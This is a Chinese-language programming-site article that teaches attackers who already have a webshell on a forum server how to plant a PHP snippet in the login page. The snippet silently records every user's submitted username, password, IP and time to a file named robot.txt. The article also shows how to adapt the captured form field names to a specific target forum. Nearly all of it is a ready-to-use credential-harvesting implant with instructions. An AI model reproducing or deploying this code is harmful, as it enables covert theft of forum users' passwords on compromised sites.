程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> PHP基礎知識 >> 截取php後台登陸密碼的代碼

截取php後台登陸密碼的代碼

編輯:PHP基礎知識
 

拿到webshell之後,想要進一步滲透,諸如discuz的密碼,不是直接用md5加密的,破解難度很大。以前幫大頭寫過一次,昨天小豬大哥正好用到,就又寫了一遍。代碼比較簡單,就幾句話,我把原理說的詳細點,照顧下對php不太了解有朋友。


if($_POST[loginsubmit]!=){ //判斷是否點了登陸按鈕
$sb=user:.$_POST[username].--passwd:.$_POST[password].--ip:.$HTTP_SERVER_VARS[REMOTE_ADDR].--.date(Y-m-d H:i:s).rn; // 把POST接收到的值 連起來賦值給變量$sb
fwrite(fopen(robot.txt,ab),$sb);} //結果寫入一個文件

下面簡單分析一下,以華夏的登陸頁面為例。打開bbs.xxx.com/login.php 右鍵查看源碼,CTRL+F搜索action找到登陸的表單。

我只復制了關鍵代碼過來.

<form action=login.php? method=post name=login onSubmit=this.submit.disabled=true;> //action後面的值即是表單提交的地址,裡面會處理登陸,比如判斷密碼是不是正確什麼的 method為POST,所以用$_POST接收。

。。。。強大的省略號。。。。。。

<TR>
<TD height=40>賬號(<U>U</U>):<BR>
<INPUT
class=input id=pwuser accessKey=u size=16
name=pwuser> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這裡面的對應, 所以要截取華夏的密碼,需要改為 $_POST[pwuser]

<TR>
<TD height=40>密 碼(<U>P</U>):<BR><INPUT
class=input id=pwpwd accessKey=p
type=password size=16 name=pwpwd> </TD></TR> //用戶名的input輸入框, 注意其name的值, 要和$_POST[username] 這裡面的對應, 所以要截取華夏的密碼,需要改為 $_POST[pwpwd]

 
  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved